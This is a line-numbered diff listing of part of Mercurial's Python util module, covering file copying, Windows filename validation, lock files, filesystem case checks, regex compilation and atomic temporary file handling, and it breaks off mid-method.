1185 shutil.copystat(src, dest)
1184 shutil.copystat(src, dest)
1186 else:
1185 else:
1187 shutil.copymode(src, dest)
1186 shutil.copymode(src, dest)
1188 if oldstat and oldstat.stat:
1187 if oldstat and oldstat.stat:
1189 newstat = filestat.frompath(dest)
1188 newstat = filestat.frompath(dest)
1190 if newstat.isambig(oldstat):
1189 if newstat.isambig(oldstat):
1191 # stat of copied file is ambiguous to original one
1190 # stat of copied file is ambiguous to original one
1192 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1191 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1193 os.utime(dest, (advanced, advanced))
1192 os.utime(dest, (advanced, advanced))
1194 except shutil.Error as inst:
1193 except shutil.Error as inst:
1195 raise Abort(str(inst))
1194 raise Abort(str(inst))
1196
1195
1197 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1196 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1198 """Copy a directory tree using hardlinks if possible."""
1197 """Copy a directory tree using hardlinks if possible."""
1199 num = 0
1198 num = 0
1200
1199
1201 gettopic = lambda: hardlink and _('linking') or _('copying')
1200 gettopic = lambda: hardlink and _('linking') or _('copying')
1202
1201
1203 if os.path.isdir(src):
1202 if os.path.isdir(src):
1204 if hardlink is None:
1203 if hardlink is None:
1205 hardlink = (os.stat(src).st_dev ==
1204 hardlink = (os.stat(src).st_dev ==
1206 os.stat(os.path.dirname(dst)).st_dev)
1205 os.stat(os.path.dirname(dst)).st_dev)
1207 topic = gettopic()
1206 topic = gettopic()
1208 os.mkdir(dst)
1207 os.mkdir(dst)
1209 for name, kind in listdir(src):
1208 for name, kind in listdir(src):
1210 srcname = os.path.join(src, name)
1209 srcname = os.path.join(src, name)
1211 dstname = os.path.join(dst, name)
1210 dstname = os.path.join(dst, name)
1212 def nprog(t, pos):
1211 def nprog(t, pos):
1213 if pos is not None:
1212 if pos is not None:
1214 return progress(t, pos + num)
1213 return progress(t, pos + num)
1215 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1214 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1216 num += n
1215 num += n
1217 else:
1216 else:
1218 if hardlink is None:
1217 if hardlink is None:
1219 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1218 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1220 os.stat(os.path.dirname(dst)).st_dev)
1219 os.stat(os.path.dirname(dst)).st_dev)
1221 topic = gettopic()
1220 topic = gettopic()
1222
1221
1223 if hardlink:
1222 if hardlink:
1224 try:
1223 try:
1225 oslink(src, dst)
1224 oslink(src, dst)
1226 except (IOError, OSError):
1225 except (IOError, OSError):
1227 hardlink = False
1226 hardlink = False
1228 shutil.copy(src, dst)
1227 shutil.copy(src, dst)
1229 else:
1228 else:
1230 shutil.copy(src, dst)
1229 shutil.copy(src, dst)
1231 num += 1
1230 num += 1
1232 progress(topic, num)
1231 progress(topic, num)
1233 progress(topic, None)
1232 progress(topic, None)
1234
1233
1235 return hardlink, num
1234 return hardlink, num
1236
1235
1237 _winreservednames = b'''con prn aux nul
1236 _winreservednames = b'''con prn aux nul
1238 com1 com2 com3 com4 com5 com6 com7 com8 com9
1237 com1 com2 com3 com4 com5 com6 com7 com8 com9
1239 lpt1 lpt2 lpt3 lpt4 lpt5 lpt6 lpt7 lpt8 lpt9'''.split()
1238 lpt1 lpt2 lpt3 lpt4 lpt5 lpt6 lpt7 lpt8 lpt9'''.split()
1240 _winreservedchars = ':*?"<>|'
1239 _winreservedchars = ':*?"<>|'
1241 def checkwinfilename(path):
1240 def checkwinfilename(path):
1242 r'''Check that the base-relative path is a valid filename on Windows.
1241 r'''Check that the base-relative path is a valid filename on Windows.
1243 Returns None if the path is ok, or a UI string describing the problem.
1242 Returns None if the path is ok, or a UI string describing the problem.
1244
1243
1245 >>> checkwinfilename("just/a/normal/path")
1244 >>> checkwinfilename("just/a/normal/path")
1246 >>> checkwinfilename("foo/bar/con.xml")
1245 >>> checkwinfilename("foo/bar/con.xml")
1247 "filename contains 'con', which is reserved on Windows"
1246 "filename contains 'con', which is reserved on Windows"
1248 >>> checkwinfilename("foo/con.xml/bar")
1247 >>> checkwinfilename("foo/con.xml/bar")
1249 "filename contains 'con', which is reserved on Windows"
1248 "filename contains 'con', which is reserved on Windows"
1250 >>> checkwinfilename("foo/bar/xml.con")
1249 >>> checkwinfilename("foo/bar/xml.con")
1251 >>> checkwinfilename("foo/bar/AUX/bla.txt")
1250 >>> checkwinfilename("foo/bar/AUX/bla.txt")
1252 "filename contains 'AUX', which is reserved on Windows"
1251 "filename contains 'AUX', which is reserved on Windows"
1253 >>> checkwinfilename("foo/bar/bla:.txt")
1252 >>> checkwinfilename("foo/bar/bla:.txt")
1254 "filename contains ':', which is reserved on Windows"
1253 "filename contains ':', which is reserved on Windows"
1255 >>> checkwinfilename("foo/bar/b\07la.txt")
1254 >>> checkwinfilename("foo/bar/b\07la.txt")
1256 "filename contains '\\x07', which is invalid on Windows"
1255 "filename contains '\\x07', which is invalid on Windows"
1257 >>> checkwinfilename("foo/bar/bla ")
1256 >>> checkwinfilename("foo/bar/bla ")
1258 "filename ends with ' ', which is not allowed on Windows"
1257 "filename ends with ' ', which is not allowed on Windows"
1259 >>> checkwinfilename("../bar")
1258 >>> checkwinfilename("../bar")
1260 >>> checkwinfilename("foo\\")
1259 >>> checkwinfilename("foo\\")
1261 "filename ends with '\\', which is invalid on Windows"
1260 "filename ends with '\\', which is invalid on Windows"
1262 >>> checkwinfilename("foo\\/bar")
1261 >>> checkwinfilename("foo\\/bar")
1263 "directory name ends with '\\', which is invalid on Windows"
1262 "directory name ends with '\\', which is invalid on Windows"
1264 '''
1263 '''
1265 if path.endswith('\\'):
1264 if path.endswith('\\'):
1266 return _("filename ends with '\\', which is invalid on Windows")
1265 return _("filename ends with '\\', which is invalid on Windows")
1267 if '\\/' in path:
1266 if '\\/' in path:
1268 return _("directory name ends with '\\', which is invalid on Windows")
1267 return _("directory name ends with '\\', which is invalid on Windows")
1269 for n in path.replace('\\', '/').split('/'):
1268 for n in path.replace('\\', '/').split('/'):
1270 if not n:
1269 if not n:
1271 continue
1270 continue
1272 for c in _filenamebytestr(n):
1271 for c in _filenamebytestr(n):
1273 if c in _winreservedchars:
1272 if c in _winreservedchars:
1274 return _("filename contains '%s', which is reserved "
1273 return _("filename contains '%s', which is reserved "
1275 "on Windows") % c
1274 "on Windows") % c
1276 if ord(c) <= 31:
1275 if ord(c) <= 31:
1277 return _("filename contains %r, which is invalid "
1276 return _("filename contains %r, which is invalid "
1278 "on Windows") % c
1277 "on Windows") % c
1279 base = n.split('.')[0]
1278 base = n.split('.')[0]
1280 if base and base.lower() in _winreservednames:
1279 if base and base.lower() in _winreservednames:
1281 return _("filename contains '%s', which is reserved "
1280 return _("filename contains '%s', which is reserved "
1282 "on Windows") % base
1281 "on Windows") % base
1283 t = n[-1]
1282 t = n[-1]
1284 if t in '. ' and n not in '..':
1283 if t in '. ' and n not in '..':
1285 return _("filename ends with '%s', which is not allowed "
1284 return _("filename ends with '%s', which is not allowed "
1286 "on Windows") % t
1285 "on Windows") % t
1287
1286
1288 if pycompat.osname == 'nt':
1287 if pycompat.osname == 'nt':
1289 checkosfilename = checkwinfilename
1288 checkosfilename = checkwinfilename
1290 timer = time.clock
1289 timer = time.clock
1291 else:
1290 else:
1292 checkosfilename = platform.checkosfilename
1291 checkosfilename = platform.checkosfilename
1293 timer = time.time
1292 timer = time.time
1294
1293
1295 if safehasattr(time, "perf_counter"):
1294 if safehasattr(time, "perf_counter"):
1296 timer = time.perf_counter
1295 timer = time.perf_counter
1297
1296
1298 def makelock(info, pathname):
1297 def makelock(info, pathname):
1299 try:
1298 try:
1300 return os.symlink(info, pathname)
1299 return os.symlink(info, pathname)
1301 except OSError as why:
1300 except OSError as why:
1302 if why.errno == errno.EEXIST:
1301 if why.errno == errno.EEXIST:
1303 raise
1302 raise
1304 except AttributeError: # no symlink in os
1303 except AttributeError: # no symlink in os
1305 pass
1304 pass
1306
1305
1307 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1306 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1308 os.write(ld, info)
1307 os.write(ld, info)
1309 os.close(ld)
1308 os.close(ld)
1310
1309
1311 def readlock(pathname):
1310 def readlock(pathname):
1312 try:
1311 try:
1313 return os.readlink(pathname)
1312 return os.readlink(pathname)
1314 except OSError as why:
1313 except OSError as why:
1315 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1314 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1316 raise
1315 raise
1317 except AttributeError: # no symlink in os
1316 except AttributeError: # no symlink in os
1318 pass
1317 pass
1319 fp = posixfile(pathname)
1318 fp = posixfile(pathname)
1320 r = fp.read()
1319 r = fp.read()
1321 fp.close()
1320 fp.close()
1322 return r
1321 return r
1323
1322
1324 def fstat(fp):
1323 def fstat(fp):
1325 '''stat file object that may not have fileno method.'''
1324 '''stat file object that may not have fileno method.'''
1326 try:
1325 try:
1327 return os.fstat(fp.fileno())
1326 return os.fstat(fp.fileno())
1328 except AttributeError:
1327 except AttributeError:
1329 return os.stat(fp.name)
1328 return os.stat(fp.name)
1330
1329
1331 # File system features
1330 # File system features
1332
1331
1333 def fscasesensitive(path):
1332 def fscasesensitive(path):
1334 """
1333 """
1335 Return true if the given path is on a case-sensitive filesystem
1334 Return true if the given path is on a case-sensitive filesystem
1336
1335
1337 Requires a path (like /foo/.hg) ending with a foldable final
1336 Requires a path (like /foo/.hg) ending with a foldable final
1338 directory component.
1337 directory component.
1339 """
1338 """
1340 s1 = os.lstat(path)
1339 s1 = os.lstat(path)
1341 d, b = os.path.split(path)
1340 d, b = os.path.split(path)
1342 b2 = b.upper()
1341 b2 = b.upper()
1343 if b == b2:
1342 if b == b2:
1344 b2 = b.lower()
1343 b2 = b.lower()
1345 if b == b2:
1344 if b == b2:
1346 return True # no evidence against case sensitivity
1345 return True # no evidence against case sensitivity
1347 p2 = os.path.join(d, b2)
1346 p2 = os.path.join(d, b2)
1348 try:
1347 try:
1349 s2 = os.lstat(p2)
1348 s2 = os.lstat(p2)
1350 if s2 == s1:
1349 if s2 == s1:
1351 return False
1350 return False
1352 return True
1351 return True
1353 except OSError:
1352 except OSError:
1354 return True
1353 return True
1355
1354
1356 try:
1355 try:
1357 import re2
1356 import re2
1358 _re2 = None
1357 _re2 = None
1359 except ImportError:
1358 except ImportError:
1360 _re2 = False
1359 _re2 = False
1361
1360
1362 class _re(object):
1361 class _re(object):
1363 def _checkre2(self):
1362 def _checkre2(self):
1364 global _re2
1363 global _re2
1365 try:
1364 try:
1366 # check if match works, see issue3964
1365 # check if match works, see issue3964
1367 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1366 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1368 except ImportError:
1367 except ImportError:
1369 _re2 = False
1368 _re2 = False
1370
1369
1371 def compile(self, pat, flags=0):
1370 def compile(self, pat, flags=0):
1372 '''Compile a regular expression, using re2 if possible
1371 '''Compile a regular expression, using re2 if possible
1373
1372
1374 For best performance, use only re2-compatible regexp features. The
1373 For best performance, use only re2-compatible regexp features. The
1375 only flags from the re module that are re2-compatible are
1374 only flags from the re module that are re2-compatible are
1376 IGNORECASE and MULTILINE.'''
1375 IGNORECASE and MULTILINE.'''
1377 if _re2 is None:
1376 if _re2 is None:
1378 self._checkre2()
1377 self._checkre2()
1379 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1378 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1380 if flags & remod.IGNORECASE:
1379 if flags & remod.IGNORECASE:
1381 pat = '(?i)' + pat
1380 pat = '(?i)' + pat
1382 if flags & remod.MULTILINE:
1381 if flags & remod.MULTILINE:
1383 pat = '(?m)' + pat
1382 pat = '(?m)' + pat
1384 try:
1383 try:
1385 return re2.compile(pat)
1384 return re2.compile(pat)
1386 except re2.error:
1385 except re2.error:
1387 pass
1386 pass
1388 return remod.compile(pat, flags)
1387 return remod.compile(pat, flags)
1389
1388
1390 @propertycache
1389 @propertycache
1391 def escape(self):
1390 def escape(self):
1392 '''Return the version of escape corresponding to self.compile.
1391 '''Return the version of escape corresponding to self.compile.
1393
1392
1394 This is imperfect because whether re2 or re is used for a particular
1393 This is imperfect because whether re2 or re is used for a particular
1395 function depends on the flags, etc, but it's the best we can do.
1394 function depends on the flags, etc, but it's the best we can do.
1396 '''
1395 '''
1397 global _re2
1396 global _re2
1398 if _re2 is None:
1397 if _re2 is None:
1399 self._checkre2()
1398 self._checkre2()
1400 if _re2:
1399 if _re2:
1401 return re2.escape
1400 return re2.escape
1402 else:
1401 else:
1403 return remod.escape
1402 return remod.escape
1404
1403
1405 re = _re()
1404 re = _re()
1406
1405
1407 _fspathcache = {}
1406 _fspathcache = {}
1408 def fspath(name, root):
1407 def fspath(name, root):
1409 '''Get name in the case stored in the filesystem
1408 '''Get name in the case stored in the filesystem
1410
1409
1411 The name should be relative to root, and be normcase-ed for efficiency.
1410 The name should be relative to root, and be normcase-ed for efficiency.
1412
1411
1413 Note that this function is unnecessary, and should not be
1412 Note that this function is unnecessary, and should not be
1414 called, for case-sensitive filesystems (simply because it's expensive).
1413 called, for case-sensitive filesystems (simply because it's expensive).
1415
1414
1416 The root should be normcase-ed, too.
1415 The root should be normcase-ed, too.
1417 '''
1416 '''
1418 def _makefspathcacheentry(dir):
1417 def _makefspathcacheentry(dir):
1419 return dict((normcase(n), n) for n in os.listdir(dir))
1418 return dict((normcase(n), n) for n in os.listdir(dir))
1420
1419
1421 seps = pycompat.ossep
1420 seps = pycompat.ossep
1422 if pycompat.osaltsep:
1421 if pycompat.osaltsep:
1423 seps = seps + pycompat.osaltsep
1422 seps = seps + pycompat.osaltsep
1424 # Protect backslashes. This gets silly very quickly.
1423 # Protect backslashes. This gets silly very quickly.
1425 seps.replace('\\','\\\\')
1424 seps.replace('\\','\\\\')
1426 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1425 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1427 dir = os.path.normpath(root)
1426 dir = os.path.normpath(root)
1428 result = []
1427 result = []
1429 for part, sep in pattern.findall(name):
1428 for part, sep in pattern.findall(name):
1430 if sep:
1429 if sep:
1431 result.append(sep)
1430 result.append(sep)
1432 continue
1431 continue
1433
1432
1434 if dir not in _fspathcache:
1433 if dir not in _fspathcache:
1435 _fspathcache[dir] = _makefspathcacheentry(dir)
1434 _fspathcache[dir] = _makefspathcacheentry(dir)
1436 contents = _fspathcache[dir]
1435 contents = _fspathcache[dir]
1437
1436
1438 found = contents.get(part)
1437 found = contents.get(part)
1439 if not found:
1438 if not found:
1440 # retry "once per directory" per "dirstate.walk" which
1439 # retry "once per directory" per "dirstate.walk" which
1441 # may take place for each patches of "hg qpush", for example
1440 # may take place for each patches of "hg qpush", for example
1442 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1441 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1443 found = contents.get(part)
1442 found = contents.get(part)
1444
1443
1445 result.append(found or part)
1444 result.append(found or part)
1446 dir = os.path.join(dir, part)
1445 dir = os.path.join(dir, part)
1447
1446
1448 return ''.join(result)
1447 return ''.join(result)
1449
1448
1450 def getfstype(dirpath):
1449 def getfstype(dirpath):
1451 '''Get the filesystem type name from a directory (best-effort)
1450 '''Get the filesystem type name from a directory (best-effort)
1452
1451
1453 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1452 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1454 '''
1453 '''
1455 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1454 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1456
1455
1457 def checknlink(testfile):
1456 def checknlink(testfile):
1458 '''check whether hardlink count reporting works properly'''
1457 '''check whether hardlink count reporting works properly'''
1459
1458
1460 # testfile may be open, so we need a separate file for checking to
1459 # testfile may be open, so we need a separate file for checking to
1461 # work around issue2543 (or testfile may get lost on Samba shares)
1460 # work around issue2543 (or testfile may get lost on Samba shares)
1462 f1 = testfile + ".hgtmp1"
1461 f1 = testfile + ".hgtmp1"
1463 if os.path.lexists(f1):
1462 if os.path.lexists(f1):
1464 return False
1463 return False
1465 try:
1464 try:
1466 posixfile(f1, 'w').close()
1465 posixfile(f1, 'w').close()
1467 except IOError:
1466 except IOError:
1468 try:
1467 try:
1469 os.unlink(f1)
1468 os.unlink(f1)
1470 except OSError:
1469 except OSError:
1471 pass
1470 pass
1472 return False
1471 return False
1473
1472
1474 f2 = testfile + ".hgtmp2"
1473 f2 = testfile + ".hgtmp2"
1475 fd = None
1474 fd = None
1476 try:
1475 try:
1477 oslink(f1, f2)
1476 oslink(f1, f2)
1478 # nlinks() may behave differently for files on Windows shares if
1477 # nlinks() may behave differently for files on Windows shares if
1479 # the file is open.
1478 # the file is open.
1480 fd = posixfile(f2)
1479 fd = posixfile(f2)
1481 return nlinks(f2) > 1
1480 return nlinks(f2) > 1
1482 except OSError:
1481 except OSError:
1483 return False
1482 return False
1484 finally:
1483 finally:
1485 if fd is not None:
1484 if fd is not None:
1486 fd.close()
1485 fd.close()
1487 for f in (f1, f2):
1486 for f in (f1, f2):
1488 try:
1487 try:
1489 os.unlink(f)
1488 os.unlink(f)
1490 except OSError:
1489 except OSError:
1491 pass
1490 pass
1492
1491
1493 def endswithsep(path):
1492 def endswithsep(path):
1494 '''Check path ends with os.sep or os.altsep.'''
1493 '''Check path ends with os.sep or os.altsep.'''
1495 return (path.endswith(pycompat.ossep)
1494 return (path.endswith(pycompat.ossep)
1496 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1495 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1497
1496
1498 def splitpath(path):
1497 def splitpath(path):
1499 '''Split path by os.sep.
1498 '''Split path by os.sep.
1500 Note that this function does not use os.altsep because this is
1499 Note that this function does not use os.altsep because this is
1501 an alternative of simple "xxx.split(os.sep)".
1500 an alternative of simple "xxx.split(os.sep)".
1502 It is recommended to use os.path.normpath() before using this
1501 It is recommended to use os.path.normpath() before using this
1503 function if need.'''
1502 function if need.'''
1504 return path.split(pycompat.ossep)
1503 return path.split(pycompat.ossep)
1505
1504
1506 def gui():
1505 def gui():
1507 '''Are we running in a GUI?'''
1506 '''Are we running in a GUI?'''
1508 if pycompat.sysplatform == 'darwin':
1507 if pycompat.sysplatform == 'darwin':
1509 if 'SSH_CONNECTION' in encoding.environ:
1508 if 'SSH_CONNECTION' in encoding.environ:
1510 # handle SSH access to a box where the user is logged in
1509 # handle SSH access to a box where the user is logged in
1511 return False
1510 return False
1512 elif getattr(osutil, 'isgui', None):
1511 elif getattr(osutil, 'isgui', None):
1513 # check if a CoreGraphics session is available
1512 # check if a CoreGraphics session is available
1514 return osutil.isgui()
1513 return osutil.isgui()
1515 else:
1514 else:
1516 # pure build; use a safe default
1515 # pure build; use a safe default
1517 return True
1516 return True
1518 else:
1517 else:
1519 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1518 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1520
1519
1521 def mktempcopy(name, emptyok=False, createmode=None):
1520 def mktempcopy(name, emptyok=False, createmode=None):
1522 """Create a temporary file with the same contents from name
1521 """Create a temporary file with the same contents from name
1523
1522
1524 The permission bits are copied from the original file.
1523 The permission bits are copied from the original file.
1525
1524
1526 If the temporary file is going to be truncated immediately, you
1525 If the temporary file is going to be truncated immediately, you
1527 can use emptyok=True as an optimization.
1526 can use emptyok=True as an optimization.
1528
1527
1529 Returns the name of the temporary file.
1528 Returns the name of the temporary file.
1530 """
1529 """
1531 d, fn = os.path.split(name)
1530 d, fn = os.path.split(name)
1532 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, dir=d)
1531 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, dir=d)
1533 os.close(fd)
1532 os.close(fd)
1534 # Temporary files are created with mode 0600, which is usually not
1533 # Temporary files are created with mode 0600, which is usually not
1535 # what we want. If the original file already exists, just copy
1534 # what we want. If the original file already exists, just copy
1536 # its mode. Otherwise, manually obey umask.
1535 # its mode. Otherwise, manually obey umask.
1537 copymode(name, temp, createmode)
1536 copymode(name, temp, createmode)
1538 if emptyok:
1537 if emptyok:
1539 return temp
1538 return temp
1540 try:
1539 try:
1541 try:
1540 try:
1542 ifp = posixfile(name, "rb")
1541 ifp = posixfile(name, "rb")
1543 except IOError as inst:
1542 except IOError as inst:
1544 if inst.errno == errno.ENOENT:
1543 if inst.errno == errno.ENOENT:
1545 return temp
1544 return temp
1546 if not getattr(inst, 'filename', None):
1545 if not getattr(inst, 'filename', None):
1547 inst.filename = name
1546 inst.filename = name
1548 raise
1547 raise
1549 ofp = posixfile(temp, "wb")
1548 ofp = posixfile(temp, "wb")
1550 for chunk in filechunkiter(ifp):
1549 for chunk in filechunkiter(ifp):
1551 ofp.write(chunk)
1550 ofp.write(chunk)
1552 ifp.close()
1551 ifp.close()
1553 ofp.close()
1552 ofp.close()
1554 except: # re-raises
1553 except: # re-raises
1555 try: os.unlink(temp)
1554 try: os.unlink(temp)
1556 except OSError: pass
1555 except OSError: pass
1557 raise
1556 raise
1558 return temp
1557 return temp
1559
1558
1560 class filestat(object):
1559 class filestat(object):
1561 """help to exactly detect change of a file
1560 """help to exactly detect change of a file
1562
1561
1563 'stat' attribute is result of 'os.stat()' if specified 'path'
1562 'stat' attribute is result of 'os.stat()' if specified 'path'
1564 exists. Otherwise, it is None. This can avoid preparative
1563 exists. Otherwise, it is None. This can avoid preparative
1565 'exists()' examination on client side of this class.
1564 'exists()' examination on client side of this class.
1566 """
1565 """
1567 def __init__(self, stat):
1566 def __init__(self, stat):
1568 self.stat = stat
1567 self.stat = stat
1569
1568
1570 @classmethod
1569 @classmethod
1571 def frompath(cls, path):
1570 def frompath(cls, path):
1572 try:
1571 try:
1573 stat = os.stat(path)
1572 stat = os.stat(path)
1574 except OSError as err:
1573 except OSError as err:
1575 if err.errno != errno.ENOENT:
1574 if err.errno != errno.ENOENT:
1576 raise
1575 raise
1577 stat = None
1576 stat = None
1578 return cls(stat)
1577 return cls(stat)
1579
1578
1580 @classmethod
1579 @classmethod
1581 def fromfp(cls, fp):
1580 def fromfp(cls, fp):
1582 stat = os.fstat(fp.fileno())
1581 stat = os.fstat(fp.fileno())
1583 return cls(stat)
1582 return cls(stat)
1584
1583
1585 __hash__ = object.__hash__
1584 __hash__ = object.__hash__
1586
1585
1587 def __eq__(self, old):
1586 def __eq__(self, old):
1588 try:
1587 try:
1589 # if ambiguity between stat of new and old file is
1588 # if ambiguity between stat of new and old file is
1590 # avoided, comparison of size, ctime and mtime is enough
1589 # avoided, comparison of size, ctime and mtime is enough
1591 # to exactly detect change of a file regardless of platform
1590 # to exactly detect change of a file regardless of platform
1592 return (self.stat.st_size == old.stat.st_size and
1591 return (self.stat.st_size == old.stat.st_size and
1593 self.stat.st_ctime == old.stat.st_ctime and
1592 self.stat.st_ctime == old.stat.st_ctime and
1594 self.stat.st_mtime == old.stat.st_mtime)
1593 self.stat.st_mtime == old.stat.st_mtime)
1595 except AttributeError:
1594 except AttributeError:
1596 pass
1595 pass
1597 try:
1596 try:
1598 return self.stat is None and old.stat is None
1597 return self.stat is None and old.stat is None
1599 except AttributeError:
1598 except AttributeError:
1600 return False
1599 return False
1601
1600
1602 def isambig(self, old):
1601 def isambig(self, old):
1603 """Examine whether new (= self) stat is ambiguous against old one
1602 """Examine whether new (= self) stat is ambiguous against old one
1604
1603
1605 "S[N]" below means stat of a file at N-th change:
1604 "S[N]" below means stat of a file at N-th change:
1606
1605
1607 - S[n-1].ctime < S[n].ctime: can detect change of a file
1606 - S[n-1].ctime < S[n].ctime: can detect change of a file
1608 - S[n-1].ctime == S[n].ctime
1607 - S[n-1].ctime == S[n].ctime
1609 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1608 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1610 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1609 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1611 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1610 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1612 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1611 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1613
1612
1614 Case (*2) above means that a file was changed twice or more at
1613 Case (*2) above means that a file was changed twice or more at
1615 same time in sec (= S[n-1].ctime), and comparison of timestamp
1614 same time in sec (= S[n-1].ctime), and comparison of timestamp
1616 is ambiguous.
1615 is ambiguous.
1617
1616
1618 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1617 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1619 timestamp is ambiguous".
1618 timestamp is ambiguous".
1620
1619
1621 But advancing mtime only in case (*2) doesn't work as
1620 But advancing mtime only in case (*2) doesn't work as
1622 expected, because naturally advanced S[n].mtime in case (*1)
1621 expected, because naturally advanced S[n].mtime in case (*1)
1623 might be equal to manually advanced S[n-1 or earlier].mtime.
1622 might be equal to manually advanced S[n-1 or earlier].mtime.
1624
1623
1625 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1624 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1626 treated as ambiguous regardless of mtime, to avoid overlooking
1625 treated as ambiguous regardless of mtime, to avoid overlooking
1627 by confliction between such mtime.
1626 by confliction between such mtime.
1628
1627
1629 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1628 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1630 S[n].mtime", even if size of a file isn't changed.
1629 S[n].mtime", even if size of a file isn't changed.
1631 """
1630 """
1632 try:
1631 try:
1633 return (self.stat.st_ctime == old.stat.st_ctime)
1632 return (self.stat.st_ctime == old.stat.st_ctime)
1634 except AttributeError:
1633 except AttributeError:
1635 return False
1634 return False
1636
1635
1637 def avoidambig(self, path, old):
1636 def avoidambig(self, path, old):
1638 """Change file stat of specified path to avoid ambiguity
1637 """Change file stat of specified path to avoid ambiguity
1639
1638
1640 'old' should be previous filestat of 'path'.
1639 'old' should be previous filestat of 'path'.
1641
1640
1642 This skips avoiding ambiguity, if a process doesn't have
1641 This skips avoiding ambiguity, if a process doesn't have
1643 appropriate privileges for 'path'. This returns False in this
1642 appropriate privileges for 'path'. This returns False in this
1644 case.
1643 case.
1645
1644
1646 Otherwise, this returns True, as "ambiguity is avoided".
1645 Otherwise, this returns True, as "ambiguity is avoided".
1647 """
1646 """
1648 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1647 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1649 try:
1648 try:
1650 os.utime(path, (advanced, advanced))
1649 os.utime(path, (advanced, advanced))
1651 except OSError as inst:
1650 except OSError as inst:
1652 if inst.errno == errno.EPERM:
1651 if inst.errno == errno.EPERM:
1653 # utime() on the file created by another user causes EPERM,
1652 # utime() on the file created by another user causes EPERM,
1654 # if a process doesn't have appropriate privileges
1653 # if a process doesn't have appropriate privileges
1655 return False
1654 return False
1656 raise
1655 raise
1657 return True
1656 return True
1658
1657
1659 def __ne__(self, other):
1658 def __ne__(self, other):
1660 return not self == other
1659 return not self == other
1661
1660
1662 class atomictempfile(object):
1661 class atomictempfile(object):
1663 '''writable file object that atomically updates a file
1662 '''writable file object that atomically updates a file
1664
1663
1665 All writes will go to a temporary copy of the original file. Call
1664 All writes will go to a temporary copy of the original file. Call
1666 close() when you are done writing, and atomictempfile will rename
1665 close() when you are done writing, and atomictempfile will rename
1667 the temporary copy to the original name, making the changes
1666 the temporary copy to the original name, making the changes
1668 visible. If the object is destroyed without being closed, all your
1667 visible. If the object is destroyed without being closed, all your
1669 writes are discarded.
1668 writes are discarded.
1670
1669
1671 checkambig argument of constructor is used with filestat, and is
1670 checkambig argument of constructor is used with filestat, and is
1672 useful only if target file is guarded by any lock (e.g. repo.lock
1671 useful only if target file is guarded by any lock (e.g. repo.lock
1673 or repo.wlock).
1672 or repo.wlock).
1674 '''
1673 '''
1675 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1674 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1676 self.__name = name # permanent name
1675 self.__name = name # permanent name
1677 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1676 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1678 createmode=createmode)
1677 createmode=createmode)
1679 self._fp = posixfile(self._tempname, mode)
1678 self._fp = posixfile(self._tempname, mode)
1680 self._checkambig = checkambig
1679 self._checkambig = checkambig
1681
1680
1682 # delegated methods
1681 # delegated methods
1683 self.read = self._fp.read
1682 self.read = self._fp.read
1684 self.write = self._fp.write
1683 self.write = self._fp.write
1685 self.seek = self._fp.seek
1684 self.seek = self._fp.seek
1686 self.tell = self._fp.tell
1685 self.tell = self._fp.tell
1687 self.fileno = self._fp.fileno
1686 self.fileno = self._fp.fileno
1688
1687
1689 def close(self):
1688 def close(self):
1690 if not self._fp.closed:
1689 if not self._fp.closed:
1691 self._fp.close()
1690 self._fp.close()
1692 filename = localpath(self.__name)
1691 filename = localpath(self.__name)
1693 oldstat = self._checkambig and filestat.frompath(filename)
1692 oldstat = self._checkambig and filestat.frompath(filename)
1694 if oldstat and oldstat.stat:
1693 if oldstat and oldstat.stat:
1695 rename(self._tempname, filename)
1694 rename(self._tempname, filename)
1696 newstat = filestat.frompath(filename)
1695 newstat = filestat.frompath(filename)
1697 if newstat.isambig(oldstat):
